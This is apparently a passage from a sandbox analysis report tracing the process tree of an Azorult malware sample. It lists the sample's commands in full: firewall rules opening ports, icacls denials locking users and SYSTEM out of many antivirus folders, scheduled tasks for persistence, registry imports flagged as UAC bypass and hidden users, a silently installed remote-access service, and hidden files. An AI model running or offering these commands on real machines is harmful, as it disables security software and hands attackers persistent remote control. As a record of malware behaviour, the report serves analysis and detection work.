      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:5740
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2960
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:10484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:5344
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8000
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:11216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8412
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:10684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8616
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:8636
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8776
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:8784
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8792
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:8800
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8832
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:9064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8600
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:9220
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:9388
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:6044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9404
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:9420
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9436
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:9512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:7844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:9520
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:9608
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:10960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:9768
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:7792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9980
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2336
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:8540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10124
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      PID:11040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:10132
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:7852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9924
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:9048
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10660
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:6668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10972
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:11100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:11056
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:10840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3644
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:10808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1476
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10952
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:9092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7252
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5148
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5252
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:6912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10708
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7708
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7228
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5212
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8016
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7972
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:6452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2452
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7716
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:10276
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:8688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9796
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7612
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9040
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:9936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:8776
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7888
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6004
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6632
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:10988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8148
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:1732
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6608
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10692
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7036
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4376
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:10312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10132
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9536
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9928
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:9372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:11180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9748
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8076
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6756
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:10536
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4008
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7744
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7172
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:4140
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4344
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:9020
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4488
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2568
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:10788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6636
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:4556
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:6608
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      PID:6868
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:5904
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:4896
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:2960
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:6452
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        
        PID:5392
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2204
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:6808
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:2964
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:5520
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:2960
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:6376
      - C:\Windows\SysWOW64\sc.exe
        
